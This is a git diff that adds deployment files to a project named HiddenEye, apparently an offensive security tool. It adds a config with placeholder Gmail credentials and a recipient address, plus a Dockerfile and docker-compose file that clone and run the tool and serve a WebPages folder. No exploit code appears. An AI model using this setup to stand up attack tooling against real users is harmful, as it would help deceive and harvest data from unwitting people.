diff --git a/Defs/FeatureManager/EmailManager/emailconfig.py b/Defs/FeatureManager/EmailManager/emailconfig.py new file mode 100644 index 0000000..957080d --- /dev/null +++ b/Defs/FeatureManager/EmailManager/emailconfig.py @@ -0,0 +1,11 @@ +# +# HiddenEye Copyright (C) 2020 DarkSec https://dark-sec-official.com +# This program comes with ABSOLUTELY NO WARRANTY; for details read LICENSE. +# This is free software, and you are welcome to redistribute it +# under certain conditions; you can read LICENSE for details. +# + + +gmail_account = "GMAILACCOUNT" +gmail_password = "GMAILPASSWORD" +recipient_email = "RECIPIENTEMAIL" diff --git a/Docker/Dockerfile b/Docker/Dockerfile new file mode 100644 index 0000000..1cfdefb --- /dev/null +++ b/Docker/Dockerfile @@ -0,0 +1,17 @@ +FROM debian:10 + +WORKDIR /home/ + +RUN apt-get update + +RUN apt-get install -y git +RUN apt-get install -y python3 +RUN apt-get install -y python3-pip +RUN apt-get install -y php +RUN apt-get update + +RUN git clone https://github.com/DarkSecDevelopers/HiddenEye + +WORKDIR /home/HiddenEye/ + +RUN pip3 install -r requirements.txt \ No newline at end of file diff --git a/Docker/docker-compose.yml b/Docker/docker-compose.yml new file mode 100644 index 0000000..11dd51b --- /dev/null +++ b/Docker/docker-compose.yml @@ -0,0 +1,20 @@ +version: '3.7' + +networks: + internet: + driver: bridge + +services: + + hidden: + container_name: hidden + build: . + image: hidden:v0.1 + command: python3 HiddenEye.py + stdin_open: true + tty: true + volumes: + - $PWD/WebPages:/home/WebPages + networks: + - internet +